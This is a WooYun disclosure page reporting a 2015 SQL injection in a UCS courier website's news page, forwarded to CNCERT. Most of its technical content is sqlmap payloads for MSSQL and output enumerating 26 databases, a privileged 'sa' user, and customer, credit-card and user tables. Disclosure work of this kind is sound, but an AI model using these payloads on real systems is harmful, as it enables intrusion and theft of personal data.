合众速递(UCS)某站存在SQL注入漏洞(涉及26个数据库\大量用户信息\近400W收货地址\包含姓名\国籍\电话\邮箱等详细信息)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0147791

漏洞标题：合众速递(UCS)某站存在SQL注入漏洞(涉及26个数据库\大量用户信息\近400W收货地址\包含姓名\国籍\电话\邮箱等详细信息)

漏洞作者：路人甲

提交时间：2015-10-19 15:47

修复时间：2015-12-07 10:58

公开时间：2015-12-07 10:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-19：细节已通知厂商并且等待厂商处理中
2015-10-23：厂商已经确认，细节仅向厂商公开
2015-11-02：细节向核心白帽子及相关领域专家公开
2015-11-12：细节向普通白帽子公开
2015-11-22：细节向实习白帽子公开
2015-12-07：细节向公众公开

简要描述：

详细说明：

合众速递/United Courier Service(UCS)是中国速递服务公司(EMS)的海外速递业务品牌。
网站主站存在POST注入漏洞，直接爆出26个数据库涉及收货地址与发货地址各近 400W，包含姓名，国籍，电话，邮箱等详细信息。。。。泄露大量重要信息。。。
另外可以跨库。。。。。
链接：http://**.**.**.**/News.asp?Method=View&NewsID=65

Host IP: **.**.**.**
Web Server: Microsoft-IIS/7.5
Powered-by: ASP.NET
Keyword Found: United
Injection type is Integer
DB Server: MSSQL 2005 with error
DB Name: UCSCA
Data Base Found: UCSCA
Data Base Found: master
Data Base Found: tempdb
Data Base Found: model
Data Base Found: msdb
Data Base Found: ReportServer
Data Base Found: ReportServerTempDB
Data Base Found: TEWNS
---
Place: POST
Parameter: NewsID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Method=View&NewsID=65 AND 2186=2186
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Method=View&NewsID=65 AND 4633=CONVERT(INT,(CHAR(58)+CHAR(121)+CHAR
(119)+CHAR(101)+CHAR(58)+(SELECT (CASE WHEN (4633=4633) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(113)+CHAR(101)+CHAR(103)+CHAR(58)))
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: Method=View&NewsID=-6855 UNION ALL SELECT NULL, CHAR(58)+CHAR(121)+
CHAR(119)+CHAR(101)+CHAR(58)+CHAR(87)+CHAR(102)+CHAR(76)+CHAR(71)+CHAR(78)+CHAR(
69)+CHAR(115)+CHAR(82)+CHAR(82)+CHAR(112)+CHAR(58)+CHAR(113)+CHAR(101)+CHAR(103)
+CHAR(58), NULL, NULL--
---
[14:53:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: Microsoft IIS 7.5, ASP.NET, ASP
back-end DBMS: Microsoft SQL Server 2008
[14:53:09] [INFO] fetching database names
[14:53:16] [INFO] the SQL query used returns 26 entries
[14:53:16] [INFO] heuristics detected web page charset 'ascii'
[14:53:52] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
 going to retry the request
[14:54:25] [INFO] the SQL query used returns 26 entries
[14:54:29] [INFO] retrieved: CCBEXP_CQ1TrackNumberUS
[14:54:29] [INFO] retrieved: CCBEXP_CQ1US
[14:54:36] [INFO] retrieved: CCBEXP_CQTrackNumberUS
[14:54:36] [INFO] retrieved: CCBEXP_CQUS
[14:54:49] [INFO] retrieved: CCBEXP_TJTrackNumberUS
[14:54:49] [INFO] retrieved: CCBEXP_TJUS
[14:54:49] [INFO] retrieved: CCBEXPTrackNumberUS
[14:54:50] [INFO] retrieved: CCBEXPUS
[14:54:50] [INFO] retrieved: master
[14:54:54] [INFO] retrieved: model
[14:54:54] [INFO] retrieved: msdb
[14:54:55] [INFO] retrieved: PassPort
[14:54:55] [INFO] retrieved: PDFLog_HK
[14:54:58] [INFO] retrieved: PDFlOG_PRODUCT
[14:55:02] [INFO] retrieved: ReportServer
[14:55:05] [INFO] retrieved: ReportServerTempDB
[14:55:09] [INFO] retrieved: tempdb
[14:55:09] [INFO] retrieved: TEWNS
[14:55:10] [INFO] retrieved: TrackNumber
[14:55:10] [INFO] retrieved: TrackNumberAU
[14:55:10] [INFO] retrieved: TrackNumberCA
[14:55:11] [INFO] retrieved: UCS
[14:55:11] [INFO] retrieved: UCSAU
[14:55:15] [INFO] retrieved: UCSCA
[14:55:18] [INFO] retrieved: UCSSetArriveDate
[14:55:22] [INFO] retrieved: UCSSetArriveDate_CQ
available databases [26]:
[*] CCBEXP_CQ1TrackNumberUS
[*] CCBEXP_CQ1US
[*] CCBEXP_CQTrackNumberUS
[*] CCBEXP_CQUS
[*] CCBEXP_TJTrackNumberUS
[*] CCBEXP_TJUS
[*] CCBEXPTrackNumberUS
[*] CCBEXPUS
[*] master
[*] model
[*] msdb
[*] PassPort
[*] PDFLog_HK
[*] PDFlOG_PRODUCT
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] TEWNS
[*] TrackNumber
[*] TrackNumberAU
[*] TrackNumberCA
[*] UCS
[*] UCSAU
[*] UCSCA
[*] UCSSetArriveDate
[*] UCSSetArriveDate_CQ
database management system users [2]:
[*] sa
[*] UCSAU
current user:    'UCSCA'
current database:    'UCSCA'
Database: UCSCA
[103 tables]
+------------------------------------+
| dbo.CallCenter_DutyAmount          |
| dbo.CallCenter_DutyDate            |
| dbo.CallCenter_OtherFee            |
| dbo.CallCenter_ReturnAddress       |
| dbo.CustomsCode_2012               |
| dbo.CustomsUnit                    |
| dbo.SYNC_MYSQL                     |
| dbo.Sync_Old2New_HpodTrackElhkTag  |
| dbo.Sync_Old2New_HpodTrackEvent    |
| dbo.Sync_Old2New_StationUserID     |
| dbo.Sync_Old2New_TrackConfirm      |
| dbo.Sync_Old2New_TrackInf          |
| dbo.Sync_Old2New_TrackWt           |
| dbo.Sync_Old2New_UserInf           |
| dbo.TianJinCG_201410528            |
| dbo.TrackNumber_20130129           |
| dbo.TrackNumber_FZ                 |
| dbo.UCS_AWB                        |
| dbo.UCS_Account                    |
| dbo.UCS_AccountType                |
| dbo.UCS_AddressBook                |
| dbo.UCS_AirLine                    |
| dbo.UCS_Airport                    |
| dbo.UCS_Area                       |
| dbo.UCS_BillIn                     |
| dbo.UCS_Billing                    |
| dbo.UCS_ChangeTrackingBounding     |
| dbo.UCS_ChangeTypeConfig           |
| dbo.UCS_CheckWeight                |
| dbo.UCS_Commission                 |
| dbo.UCS_Country                    |
| dbo.UCS_Coupon                     |
| dbo.UCS_CreditCard                 |
| dbo.UCS_Currency                   |
| dbo.UCS_Dispatch                   |
| dbo.UCS_EDIDispatch                |
| dbo.UCS_EDIErrorCode               |
| dbo.UCS_EDILog                     |
| dbo.UCS_EDIState                   |
| dbo.UCS_Email                      |
| dbo.UCS_EmsReturnInfo              |
| dbo.UCS_ExportInsurance            |
| dbo.UCS_ExportInsuranceRemark      |
| dbo.UCS_Flight                     |
| dbo.UCS_FreeTrackNumber            |
| dbo.UCS_Help                       |
| dbo.UCS_InBilling                  |
| dbo.UCS_Insurance                  |
| dbo.UCS_Invoice                    |
| dbo.UCS_InvoiceItemClass1          |
| dbo.UCS_InvoiceItemClass2          |
| dbo.UCS_InvoiceItemClass3          |
| dbo.UCS_InvoiceItemClass4          |
| dbo.UCS_IsElHkTrack                |
| dbo.UCS_Item                       |
| dbo.UCS_Log                        |
| dbo.UCS_Manifest                   |
| dbo.UCS_ManifestStatusLog          |
| dbo.UCS_News                       |
| dbo.UCS_NoAuthenticateTrackNumber  |
| dbo.UCS_Package                    |
| dbo.UCS_PackageStatusLOG           |
| dbo.UCS_PackingList                |
| dbo.UCS_PaymentType                |
| dbo.UCS_PickupLocation             |
| dbo.UCS_PickupQueue                |
| dbo.UCS_QuickPOD                   |
| dbo.UCS_Rate                       |
| dbo.UCS_Rate_Account_Sync          |
| dbo.UCS_Remark                     |
| dbo.UCS_ReturnPackage              |
| dbo.UCS_SaleSlip                   |
| dbo.UCS_SchedulePickup             |
| dbo.UCS_Setup                      |
| dbo.UCS_Shipment                   |
| dbo.UCS_ShipmentItem               |
| dbo.UCS_ShippingMark               |
| dbo.UCS_Staff                      |
| dbo.UCS_Station                    |
| dbo.UCS_StationContact             |
| dbo.UCS_StationLOG                 |
| dbo.UCS_Surcharge                  |
| dbo.UCS_TrackNumberTJ              |
| dbo.UCS_TrackNumberTJHistory       |
| dbo.UCS_TrackingConfirm            |
| dbo.UCS_TrackingNoManage           |
| dbo.UCS_Transit                    |
| dbo.UCS_TransitStatus              |
| dbo.UCS_Type                       |
| dbo.UCS_UPUCode                    |
| dbo.UCS_User                       |
| dbo.UCS_Vendor                     |
| dbo.UCS_ZIPCodeCA                  |
| dbo.UCS_ZIPCodeCN                  |
| dbo.UCS_ZIPCodeHK                  |
| dbo.UCS_ZIPCodeTW                  |
| dbo.Ucs_ManifestStatus             |
| dbo.Ucs_ManifestUploadLog          |
| dbo.[CallCenter_Duty.bak_20101110] |
| dbo.[CallCenter_Duty.bak_20101110] |
| dbo.[UCS_Pre-Manifest]             |
| dbo.sysc                           |
| dbo.test                           |
+------------------------------------+

漏洞证明：

Database: UCSAU
[193 tables]
+---------------------------------------+
| dbo.CallCenter_BankOut                |
| dbo.CallCenter_Bankin                 |
| dbo.CallCenter_CustomsCheck           |
| dbo.CallCenter_Duty                   |
| dbo.CallCenter_DutyCustomsCode        |
| dbo.CallCenter_DutyDate               |
| dbo.CallCenter_OtherFee               |
| dbo.CallCenter_ReturnGroup            |
| dbo.CallCenter_TrackPackage           |
| dbo.CallCenter_UserManage             |
| dbo.CustomsCode_2012                  |
| dbo.CustomsUnit                       |
| dbo.EMSID_TrackNumber                 |
| dbo.SYNC_MYSQL                        |
| dbo.Sync_Old2New_HpodTrackElhkTag     |
| dbo.Sync_Old2New_HpodTrackEvent       |
| dbo.Sync_Old2New_StationUserID        |
| dbo.Sync_Old2New_TrackConfirm         |
| dbo.Sync_Old2New_TrackInf             |
| dbo.Sync_Old2New_TrackWt              |
| dbo.Sync_Old2New_UserInf              |
| dbo.TrackNumber_FZ                    |
| dbo.UCS_ARCompare                     |
| dbo.UCS_AWB                           |
| dbo.UCS_AWBHouse                      |
| dbo.UCS_Account                       |
| dbo.UCS_AccountType                   |
| dbo.UCS_AddressBook                   |
| dbo.UCS_AirLine                       |
| dbo.UCS_Airport                       |
| dbo.UCS_Area                          |
| dbo.UCS_ArrivalNotice                 |
| dbo.UCS_AwbAddress                    |
| dbo.UCS_AwbNoManage                   |
| dbo.UCS_AwbNumber                     |
| dbo.UCS_AwbRate                       |
| dbo.UCS_AwbRateAdjust                 |
| dbo.UCS_BEEvent                       |
| dbo.UCS_BatchArrival                  |
| dbo.UCS_BatchImport                   |
| dbo.UCS_BillHistory                   |
| dbo.UCS_BillIn                        |
| dbo.UCS_BillInPayFee                  |
| dbo.UCS_BillInvoice                   |
| dbo.UCS_BillInvoiceStatus             |
| dbo.UCS_BillOtherFee                  |
| dbo.UCS_BillPrintInvoice              |
| dbo.UCS_BillRece                      |
| dbo.UCS_BillSS                        |
| dbo.UCS_BillTemp                      |
| dbo.UCS_Billinfo                      |
| dbo.UCS_ChangeTrackingBounding        |
| dbo.UCS_ChangeTypeConfig              |
| dbo.UCS_CheckBank                     |
| dbo.UCS_CheckData                     |
| dbo.UCS_CheckPrint                    |
| dbo.UCS_CheckUser                     |
| dbo.UCS_CheckWeight                   |
| dbo.UCS_Commission                    |
| dbo.UCS_Country                       |
| dbo.UCS_Coupon                        |
| dbo.UCS_CreditCard                    |
| dbo.UCS_Currency                      |
| dbo.UCS_Customer                      |
| dbo.UCS_CustomerNeeds                 |
| dbo.UCS_CustomsCode                   |
| dbo.UCS_CustomsUnit                   |
| dbo.UCS_Dispatch                      |
| dbo.UCS_DriverWorkTime                |
| dbo.UCS_EDIDispatch                   |
| dbo.UCS_EDIErrorCode                  |
| dbo.UCS_EDILog                        |
| dbo.UCS_EDIState                      |
| dbo.UCS_Email                         |
| dbo.UCS_EmsGroup                      |
| dbo.UCS_EmsReturnInfo                 |
| dbo.UCS_Envelope                      |
| dbo.UCS_ExportInsurance               |
| dbo.UCS_ExportInsuranceRemark         |
| dbo.UCS_Flight                        |
| dbo.UCS_FreePackage                   |
| dbo.UCS_FreeTrackNumber               |
| dbo.UCS_HShipment                     |
| dbo.UCS_Help                          |
| dbo.UCS_HpodInsError                  |
| dbo.UCS_Insurance                     |
| dbo.UCS_InsuranceCommission           |
| dbo.UCS_Inventory                     |
| dbo.UCS_InvoiceItemClass1             |
| dbo.UCS_InvoiceItemClass2             |
| dbo.UCS_InvoiceItemClass3             |
| dbo.UCS_InvoiceItemClass4             |
| dbo.UCS_InvoiceNote                   |
| dbo.UCS_IsElHkTrack                   |
| dbo.UCS_Item                          |
| dbo.UCS_Location                      |
| dbo.UCS_Log                           |
| dbo.UCS_LoginLog                      |
| dbo.UCS_MGroup                        |
| dbo.UCS_MainInvoice                   |
| dbo.UCS_Manifest                      |
| dbo.UCS_ManifestAddress               |
| dbo.UCS_ManifestHistory               |
| dbo.UCS_ManifestStatusLog             |
| dbo.UCS_MultiplePOD                   |
| dbo.UCS_News                          |
| dbo.UCS_NoAuthenticateTrackNumber     |
| dbo.UCS_OweHistory                    |
| dbo.UCS_Package                       |
| dbo.UCS_PackageStatusLOG              |
| dbo.UCS_PackingList                   |
| dbo.UCS_Partner                       |
| dbo.UCS_PartnerContact                |
| dbo.UCS_PartnerPackingList            |
| dbo.UCS_PaymentType                   |
| dbo.UCS_Performance                   |
| dbo.UCS_PickupAddress                 |
| dbo.UCS_PickupLocation                |
| dbo.UCS_PickupQueue                   |
| dbo.UCS_PrePaidPackage                |
| dbo.UCS_PrintTrackNO                  |
| dbo.UCS_QuickPOD                      |
| dbo.UCS_Rate                          |
| dbo.UCS_Reason                        |
| dbo.UCS_ReceiveAddress                |
| dbo.UCS_ReceiveGroup                  |
| dbo.UCS_ReceivePackage                |
| dbo.UCS_ReceivePackageBindInvoiceNote |
| dbo.UCS_Refund                        |
| dbo.UCS_Remark                        |
| dbo.UCS_ReturnPackage                 |
| dbo.UCS_RmBigClass                    |
| dbo.UCS_RmSmallClass                  |
| dbo.UCS_SchedulePickup                |
| dbo.UCS_SenderAddress                 |
| dbo.UCS_Setup                         |
| dbo.UCS_Shipment                      |
| dbo.UCS_ShipmentItem                  |
| dbo.UCS_ShippingMark                  |
| dbo.UCS_Staff                         |
| dbo.UCS_Station                       |
| dbo.UCS_StationArea                   |
| dbo.UCS_StationContact                |
| dbo.UCS_StationLOG                    |
| dbo.UCS_SubInvoiceNote                |
| dbo.UCS_Surcharge                     |
| dbo.UCS_Tax                           |
| dbo.UCS_TaxLog                        |
| dbo.UCS_TaxPackage                    |
| dbo.UCS_TrackNumberTJ                 |
| dbo.UCS_TrackNumberTJHistory          |
| dbo.UCS_TrackingConfirm               |
| dbo.UCS_TrackingNoManage              |
| dbo.UCS_Transit                       |
| dbo.UCS_TransitStatus                 |
| dbo.UCS_TransportCar                  |
| dbo.UCS_TransportOilWear              |
| dbo.UCS_TransportOiling               |
| dbo.UCS_Type                          |
| dbo.UCS_UPUCode                       |
| dbo.UCS_User                          |
| dbo.UCS_UserGroup                     |
| dbo.UCS_Vendor                        |
| dbo.UCS_VendorRate                    |
| dbo.UCS_ZIPCodeAU                     |
| dbo.UCS_ZIPCodeCN                     |
| dbo.UCS_ZIPCodeHK                     |
| dbo.UCS_ZIPCodeTW                     |
| dbo.UCS_ZIPCodeUS                     |
| dbo.UCS_ZipArea                       |
| dbo.Ucs_HpodData                      |
| dbo.Ucs_ManifestStatus                |
| dbo.Ucs_ManifestUploadLog             |
| dbo.Ucs_SchedulePickupConfirm         |
| dbo.Warehouse_BigClass                |
| dbo.Warehouse_Express                 |
| dbo.Warehouse_GoodsClass              |
| dbo.Warehouse_Location                |
| dbo.Warehouse_Name                    |
| dbo.Warehouse_Package                 |
| dbo.Warehouse_PickupAddress           |
| dbo.Warehouse_Product                 |
| dbo.Warehouse_ProductItem             |
| dbo.Warehouse_ProductOrder            |
| dbo.Warehouse_ProductOrderDetail      |
| dbo.Warehouse_ServiceFee              |
| dbo.Warehouse_Shelf                   |
| dbo.Warehouse_SmallClass              |
| dbo.Warehouse_SubPackage              |
| dbo.Warehouse_TransitLog              |
| dbo.Warehouse_User                    |
| dbo.[UCS_Pre-Manifest]                |
| dbo.temptb                            |
+---------------------------------------+

太多数据了就不跑了。。。。。。。
<img src="/upload/201510/19152040cb1f530db852be30ee3c61b62b00a7ce.png"alt="6.png" />

修复方案：

你懂的

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-10-23 10:56

厂商回复：

CNVD确认并复现所述情况，已由CNVD通过网站管理方公开联系渠道向其邮件通报，由其后续提供解决方案。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0147791

漏洞标题：合众速递(UCS)某站存在SQL注入漏洞(涉及26个数据库\大量用户信息\近400W收货地址\包含姓名\国籍\电话\邮箱等详细信息)

相关厂商：合众速递(UCS)

漏洞作者：路人甲

提交时间：2015-10-19 15:47

修复时间：2015-12-07 10:58

公开时间：2015-12-07 10:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0147791

漏洞标题：合众速递(UCS)某站存在SQL注入漏洞(涉及26个数据库\大量用户信息\近400W收货地址\包含姓名\国籍\电话\邮箱等详细信息)

相关厂商：合众速递(UCS)

漏洞作者： 路人甲

提交时间：2015-10-19 15:47

修复时间：2015-12-07 10:58

公开时间：2015-12-07 10:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0147791"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云